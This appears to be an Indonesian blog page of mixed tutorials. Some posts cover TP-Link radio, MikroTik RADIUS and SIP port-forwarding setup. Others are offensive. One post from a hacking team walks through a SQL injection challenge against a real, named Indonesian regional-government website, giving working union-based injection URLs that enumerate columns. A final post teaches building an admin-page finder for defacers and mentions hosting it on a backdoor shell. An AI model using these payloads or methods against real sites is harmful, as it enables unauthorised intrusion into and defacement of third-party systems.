Cara Mudah Setting Radio TP-Link TL-WA701ND Untuk Hotspot

Pada kesempatan kali ini saya akan share bagaimana cara mudah setting Radio TP-Link TL-WA701ND, pada artikel Cara Setting Radio TP-Link TD-W8151N Untuk Hotspot juga sudah saya jelaskan. Nah pada seri ini cuma beda step by step-nya karena apa? Seri-nya aja sudah beda, apalagi tool, menu, tampilan, dll? Pasti langkah dan tingkat kerumitan settingan sudah berbeda. Iya to...?

Langsung ke Topik aja ya~

Sebelum anda melakukan instalasi Radio, lihat-lihat aja dulu informasi yang ada di radio tersebut. Disana pasti ada informasi mengenai IP Address default radio, dsb. Ini hampir semua radio juga memiliki informasi yang sama dan tertera pada fisik radio tersebut. Nah setelah anda lihat-lihat dan tau IP Address default-nya berapa silahkan lakukan instalasi power radio tersebut sesuai dengan rencana anda sendiri. Misal anda akan menggabungkan dengan antena yang anda taruh diatas Tower, pastinya instalasinya sudah berbeda. 

Oke, lanjut ke Teknis~

Radio seri ini IP Address defaultnya adalah: 192.168.0.254

1. Pertama silahkan setting IP Address laptop atau komputer anda satu subnet dengan IP Address default si Radio. Jika IP radio-nya 192.168.0.254 maka anda bisa menggunakan IP 192.168.0.1-192.168.0.253 pada laptop anda. Perhatikan gambar settingan IP Address dibawah ini:

2. Masukkan username : admin password: admin (default)

3. Pada Quick Setup Next aja.

4. Pilih Access Point pada Operation Mode. Disini karena kita akan menggunakan untuk memancarkan Wi-Fi maka menggunakan mode tersebut. Untuk mode yang lain silahkan baca aja deskripsi singkat yang ada disamping tulisan mode tersebut.

5. Perhatian:

SSID : AP-Lux-Smart (Nama Wi-Fi yang nantinya muncul pada Wireless laptop anda)

Wireless Security Mode : WPA/WPA2-PSK (Type security)

Wireless Password : lukman (password yang nantiya anda isi setelah meng-connect-kan ke SSID diatas)

Jika anda tidak ingin mengisi passwordnya silahkan pilih Wireless Security Mode : No Security

6. Perhatian-2:

DHCP Server : Disable (Nanti dapat IP dari router). Disini saya menggunakan sebuah router yang nanti saya hubungkan ke Radio ini, jadi saya non-aktifkan (disabled). Jika saya enable maka client akan mendapat IP yang satu sabnet (beda host) dengan si radio.

IP Address :  192.168.0.254 (IP ini untuk me-remote radio, jika anda mengubah IP Address ini maka anda juga harus mengubah IP laptop anda ketika akan meremote radio)

7. Terakhir, ini adalah tahap informasi settingan yang tadi anda buat. Setelah anda benar-benar yakin dengan settingan anda, silahkan Reboot.

Semoga membantu anda yang masih belajar...

Read more

SQL Level tricky injection

[SQL injection Level   HIGH]

Assalamu’alaikum wr.wb

Sesuai janji k.minato di group , jika likenya > 50 maka kk akan kasih solusi quernya.. \ :D /

Buat yg udah merasa leet, skip aja tutorial ini yh J (y)

Dalam challenge kali ini.. tasknya adalah

task::
must union based Not Error Based
print your name,table & column..

dari hasil PM teman”  bahkan kk yg leet sekalipun :v  telah terkirim semuanya menggunakan error based.. namun itu tidaklah memenuhi task pada challenge..

BTW seperti apa sih query error based pada chall ini.. oke kita pemanasan dulu gays ..

Buka AdvanceHackbar kalian, lalu tambahkn ‘

http://dprd-brebeskab.go.id/?hal=berita&nid=33’  ßerror

Dalam memunculkn query EB .. kita bias menggunakan command awal operator AND,OR,Where, UNION SELECT..

Di web ini perintah yg work adalah menggunakan union select [query error based disini]

Okey kita langsung inject, ketik union select dan masukkn query EB dari  hackbar..

Aaand BOoM ..semudah  itu kan :v

..

Jika kita niatnya **** untuk web ini .. dengan EB aja udah cukup.. tapi wait ini adalah challenge (must union based Not ERROR BASED )

So, bagaimana cara inject dengan Union based ??????

1.       Diketahui dari error yg muncul adalah :

Wrong SQL Statement: SELECT s.* FROM (SELECT @BeritaID:=33\' p) parm , v_komentar_berita s
Mysql Comment:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' p) parm , v_komentar_berita s' at line 1

  SELECT s.* FROM (SELECT @BeritaID:=33\' p)    ß tanda \’ artinya input di parameter ini tidak menerima string, berarti type injectnya adalah integer type

2.       Tahap selanjutnya adalah membalance inputnya, supaya query injection dapat  kita masukan kedalam parameter, disinilah letak challenge di mulai 3:) . Perhatikan error statementnya :

SELECT s.* FROM (SELECT @BeritaID:=33\' p) parm , v_komentar_berita s

Angka 33 adalah nilai parameter dari ini .. ?hal=berita&nid=33  jika kita membalance hanya dengan

?hal=berita&nid=33 +--+

?hal=berita&nid=33 %23

?hal=berita&nid=33 %60

Maka itu tidak akan work sama sekali :P , so perhatikan lagy error spt di gambar .. terdapat query p) parm , v_komentar_berita s   dibelakang parameternya..  maka kita tambahkan query itu di di parameter lalu balancing

?hal=berita&nid=33  p) parm , v_komentar_berita s +--+

Dan page kembali normal seperti sedia kala ;-) , artinya query sql bias kita input

Ketik order by seperti inject biasanya

Diketahui jumlah column = 11 , sekarang saatnya kita union based kan ..

Daannn BoooooooMMM  XD  GAGAL SEMUA  wkwkwkwk anda memasuki inti dari challenge ini XD.

Saya yakin kebanyakan dari Injector akan banyak yg gagal disini.. bahkan beberapa leet ada yg dh give up minta solusi XD .. skrg bagaimanakah solusi untuk Minimal saja menampilkan nilai vuln columnnya ???????

##

Coba perhatikan saat kita suksess membalance nya..

?hal=berita&nid=33  p) parm , v_komentar_berita s +--+

Page yg ditampilkan adalah halaman komentar.. dan disana  belom ada yg berkomentar sama sekali.. maka didatabase nya belum terisi apa apa.. sehingga vuln column tdk tampil .. lalu kenapa kk Sec7or suksess menampilkan vuln columns..???????

##BERIKUT QUERY RAHASIANYA##

Diketahui  v_komentar_berita dan s adalah nama table, lalu ketik dibawaah ini ::

?hal=berita&nid=33 PESAN_KAMI) klw_ad_yg_copas_sertakan_copyright_from_sec7or , v_komentar_berita s UNION/**TUtorial_by_Sec7or**/SELECT s.* FROM (SELECT 31337

Nah perhatikan pada Wrong SQL Statement nya.. kita mendapatkan table baru disana bernama v_berita dan s .. nah tanpa berfikir panjang instinc injec7or langsung menusuk..

?hal=berita&nid=33  p) parm , v_berita s +--+

Joss.. kali ini page kembali normal dengan balancing pada table v_berita  . dan isi yg ditampilkn bukan lagy komentar melainkan isi berita seperti awal.. dan lanjutkan order by 1+--+  seperti biasa untuk nampilin vuln columnnya :D

?hal=berita&nid=33 p) parm , v_berita s where/**tutorial_udah_berakhir_thanks_atas_partisipasinya**/1/**team_sec7or_**/=/**mastering_of_sql_injection**/0 UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12+--+

Sekian solusi challenge kali ini..  dan yg terakhir kami ucapkan terima kasih bnyk kepada k.fuad dan k.sanusi .. yg telah bnyk menemukan hal baru di dunia sql injection..

SQL injection sekarang telah berkembang pesat lebih dalam dalam dan lebih dalam,namun kami team se7or.. akan selalu  upgrade sql weapon kami

Read more

User Manager (Radius Server) Hotspot MikroTik

Pada kesempatan kali ini kita akan coba bermain-main dengan User Manager MikroTik (RADIUS Server Application). 

User Manager disini bisa langsung berada satu RB MikroTik / PC Router, (yang terpenting included package User Manager didalamnya). Karena rencana saya akan memisahkan antara RB MikroTik dengan PC UM, maka saya siapkan  satu lagi sebuah PC untuk User Manager, nah disini saya instal MikroTik User Manager-nya di PC tersebut.

Persiapan yang harus anda penuhi adalah menyiapkan master MikroTik.iso (include User Manager).

System Requirement Hardware dan Penjelasan User Manager lainya sudah ada didalam website resmi MikroTik, silahkan baca-baca dulu: 

Wiki User Manager

UM bisa digunakan untuk manajemen sistem :
HotSpot users;
PPP (PPtP/PPPoE) users;
DHCP users;
Wireless users;
RouterOS users.

Oke, disini saya akan memberikan tutorial sederhana cara membangun User Manager Hotspot (RADIUS Server), simak topologi yang saya buat dibawah ini:

Informasi:

IP Address RB MikroTik:
Ether1 : 10.10.10.2/24 Gateway : 10.10.10.1/24 (Access Internet)
Ether2 : 192.168.2.1/24
Ether3 : 192.168.3.1/24

IP Address User Manager (Radius Server):
Ether1 : 192.168.2.2/24

IP Address Client:
Client A : 192.168.3.2/24

Pembahasan:

1. RB MikroTik, cukup basic-configuration saja, IP Address disesuaikan dengan IP yang diatas. Setelah itu setting DNS-nya kemudian Gateway (Routes). (NB: Silahkan atur sendiri konfigurasi-nya dengan rencana yang akan anda bangun).

2. PC User Manager MikroTik, juga cukup dikonfigurasi basic-configuration saja. Atur IP Address Ether1 satu subnet (beda host) dengan RB MikroTik Ether2. DNS dan Gateway (Routes) menyesuaikan.

3. IP Address Client, mendapat IP secara DHCP. Sebelumnya telah disetting DHCP Server pada RB MikroTik.

Instalasi User Manager (Radius Server) MikroTik:
1. Burn dulu master mikrotik.iso pada sebuah USB atau CD.

2. Atur BIOS, sesuaikan boot-primary ke USB (jika anda menggunakan usb) atau CD (jika anda menggunakan CD). 

3. Masuk ke menu Mikrotik Software Installation, disini saya instal semua package yang ada, yang terpenting adalah package user-manager. Tekan a - i -n - y pada keyboard anda untuk memilih semua dan instal package yang ada.

2. Setelah itu konfigurasi (basic) MikroTik User Manager, disini saya menggunakan Winbox untuk mengkonfigurasi-nya. Silahkan disimak mulai dari IP Address, DNS, Routes.

Integrasi Routerboard MikroTik Dengan User Manager:
1. Disini saya telah konfigurasi Routerboard MikroTik-nya (basic-configuration). Sebelumnya saya juga telah setting Hotspot pada MikroTik ini pada Ether3 yang mengarah ke Client. Setelah dikonfigurasi hotspotnya silahkan buka kembali menu IP - Hotspot kemudian pilih Tab Server Profiles. Klik hsprof1 lalu ke Tab RADIUS, kemudian Checklist Use RADIUS (Apply-OK)

2. Selanjutnya (masih pada konfigurasi RB MikroTIK). Pilih menu utama Radius kemudian Add '+' lalu checklist pada hotspot. Isi Address dengan IP User Manager Mikrotik, secret silahkan isi sesuai dengan keinginan anda, secret ini adalah password yang nantinya dibutuhkan untuk Routes pada MikroTik User Manager. (Apply-OK)

Oke, pengaturan awal pada MikroTik User Manager dan RB MikroTik sudah selesai. Konfigurasi diatas adalah untuk meng-integrasikan antara User Manager dengan Hotspot RB MikroTik anda. Masih ada pengaturan lagi supaya keduanya saling terhubung, diantaranya nanti harus setting Routes, Profile, dan User
~Selanjutnya kita akan melakukan pengaturan pada User Manager-nya.

Setting User Manager:
1. Silahkan laptop client login ke Hotspot lalu buka [ip-userman/userman] => [192.168.2.2/userman]. Masuk dengan user 'admin' dan password 'kosong'.

2. Pertama adalah setting menu Routers MikroTik User Manager, disini maksudnya adalah siapa yang ingin mengakses si User Manager harus di daftarkan pada menu ini. Disini yang mengakses User Manager adalah si RB MikroTik, jadi saya akan menambahkan IP RB MikroTik supaya ke Routes oleh User Manager.

Step by step: (Routes - Add - New)
Name : RB-MikroTik (Terserah)
IP Address : 192.168.2.1 (IP RB MikroTik)
Shared secret : luxsmart (Password yang diberikan saat setting menu utama Radius di RB Mikrotik)
~Add

3. Selanjutnya, pada menu Profiles, menu ini digunakan untuk mengatur Limitation, Profil, Validity, Price, dsb.

Step by step: (Profiles - Limitations - Add - New)
Name : Paket 1 Jam (Ubah sesuai keinginan anda)
Uptime : 1h (Lama waktu user akses hotspot "1h = 1 jam")
~Add

Silahkan buat Limitation lagi dengan jenis yang berbeda (Sesuai keinginan anda)

4. Selanjutnya, kita akan setting Profiles-nya. Sebelumnya kita telah setting Limitations-nya, nah setelah setting limitations-nya silahkan buat Profiles sesuai dengan Limitations tadi.
Tadi kita telah membuat Limitations (Paket 1 Jam dan Paket 2 Jam), nah di Profiles ini kita akan memberikan pengaturan tambahan untuk Limitations Paket 1 dan 2 Jam tadi.

Step by step : ( Profiles - Profiles - '+')

Name : Profil 1 Jam (Profile untuk limitations Paket 1 Jam)
~Create

5. Lanjutan,
Name : Profil 1 Jam (Nama Profile Limitations Paket 1 Jam)
Validity : 1d (Masa aktif user setelah login 1d = 1 hari)
Price : 2500 (Harga Paket 1 Jam)
Share users : not  used (Tidak menggunakan shared users, ini digunakan untuk menggandakan user 1 untuk beberapa orang yang akses, misalkan ini diisi 2 maka yang menggunakan user dengan profil ini bisa digunakan oleh 2 orang)
~Add new limitation 
# Pilih Limits-nya kemudian Save Profile

6. Selanjutnya untuk menambahkan Profiles baru silahkan klik icon '+' setelah itu isi Name lalu Create.

7. Oke, sekarang kita telah sampai pada pembuatan User Hotspot yang dibuat di MikroTik User Manager.

Step by step : (Users - Add - One)
Username : satujam (user hotspot)
Password : satujam (password user hotspot)
Assign profile: Profil 1 Jam (2500.00) (Pemilihan profil untuk user 'satujam')
~Add

8. Pengecekan User Manager.

Jadi, kesimpulanya adalah : User Manager ini difungsinkan untuk pembuatan user ter-CENTRAL dengan konfigurasi tambahan atau limitations tersendiri.

Untuk pembuatan user berskala banyak dan pengaturan-pengaturan tambah ayo kita diskusikan dikomentar saja. Kelihatanya lebih asyik. He he he...

Read more

MikroTik Forwarding Port SIP IP Public To IP Lokal Server AsteriskNOW

MikroTik Forwarding Port SIP

Jika kita ingin membuat server AsteriskNOW kita bisa digunakan untuk Publik maka salah satu caranya yaitu dengan menggunakan Port Forwarding, yang dikonfigurasi pada device yang menerima IP Publik dari ISP. Biasanya IP publik tersebut diletakan disebuah device Modem atau Router langsung. Setelah itu baru disetting Port Forwarding, jika anda meletakan IP Publik tersebut pada sebuah device Modem maka port forwarding anda setting pada device tersebut, begitu juga jika anda meletakkan IP Publik tsb pada sebuah Router, maka anda setting port forwarding-nya pada router tersebut. Teknik ini cara kerjanya adalah mem-forward port server lokal supaya dapat dipanggil pada jaringan publik. Nah, pada tutorial ini saya share Cara Setting MikroTik Port Forwarding Port SIP IP Public To IP Lokal Server AsteriskNOW.

Informasi:

IP Publik : 192.5.5.10 => Disesuaikan dengan IP publik anda.

IP Server Lokal Asterisk = 10.10.90.2 => Disesuaikan dengan IP server lokal anda.

Pengaturan pada MikroTik:

1. Forwarding Port 5060 [publik to local]

2. Forwarding Port 10001-20000 [publik to local]

Buka menu IP => Firewall => NAT [Add] (MikroTik WinBox atau WebFig) 

NAT-Pertama:

Tab Action

 

Apply => OK

NAT-Kedua: 

Add lagi~

 Tab Action

Apply => OK


Hasil:

Urusan di MikroTik sudah selesai.

Sekarang kita akan konfigurasi pada AsteriskNOW-nya.

Silahkan konfigurasi AsteriskNOW-nya menggunakan WebGUI dengan cara memanggil IP Address AsteriskNOW pada address bar Browser.

#Pilih menu Setting => Asterisk SIP Setting 

#Override External IP = 192.5.5.10 => ip-publik
#Setelah itu sesuaikan dengan gambar dibawah ini:

#Setelah itu silahkan Submit Change - Apply Change
#Tambahkan rule iptables pada Asterisk, pada bagian ini anda harus tambahka pada shell server, atau anda bisa remote via SSH:

# iptables -A INPUT -p udp -m udp --dport 5060 -j ACCEPT

#Setelah itu restart Asterisk-nya.

# service asterisk restart

(NB: Direkomendasikan tidak mem-forward port 80)

Silahkan dial-up user SIP Asterik mengguakan ip-publik anda. Selamat mencoba...

Read more

Tutorial Membuat Scanner/Finder pada Website

Kali ini gua akan memberikan sedikit ilmu bagi orang yang baru dalam dunia coding. sebenernya sih ga rumit-rumit amat kalo kita niat dan mau usaha .

Oke gausah panjang lebar, kali ini gua mau memberikan sedikit tutorial untuk membuat sebuah Scanner/Finder dalam Website. apasih scanner/finder? Tujuannya untuk apa?

Scanner atau Vulnerability Scanner sering sekali dipakai para defacer-defacer yang gamau cape-cape untuk nemuin sebuah vuln dalam website targetnyaa. Finder juga sama seperti itu, tujuannya untuk mengecek website target apakah ada File/Folder yang kita cari ingin cari menggunakan tools buatan kita sendiri.

Bahan-bahannya :

- Code Editor ( Notepad, Notepad++, Sublime text, dll ) seenaknya lu aja mau pake apa.
- Website Target

[ Disini gua akan membuat Popoji CMS Admin Finder ]
Walaupun bentuknya sudah fix atau sudah ada dari sananya, setidaknya kita mengerti pembelajaran ini.

Pertama, buatlah form html textarea untuk tempat target yang nantinya mau kita scan.

Kedua, Kita buat script eksekusinya menggunakan PHP Code.
Gua harap disini kalian cepet-cepet belajar PHP Curl ( bagi yang blm ngerti ) karena disini kita akan sering ketemu PHP Curl.

NB: Fungsi-fungsi CURL diatas sering sekali digunakan dalam membuat Auto Exploiter ataupun Vulnerability Scanner, Jadi diusahakan dalam bagian ini di mengerti. Code CURL diatas tadi blm termasuk semuanya. jadi anda bisa pelajari selengkapnya.

Jika sudah, satukan semua code.

Selanjutnya, coba deh taro di hosting/shell backdoor.

Jika berhasil ....

Penjelasan mengenai kode-kode diatas.

......................
Jika tidak mengerti dalam penggunaan" kode diatas bisa di diskusikan di grup indoxploit. kalo punya inisiatif yaaa tinggal searching aja bro di google banyak hehe ^_^ ......................

Read more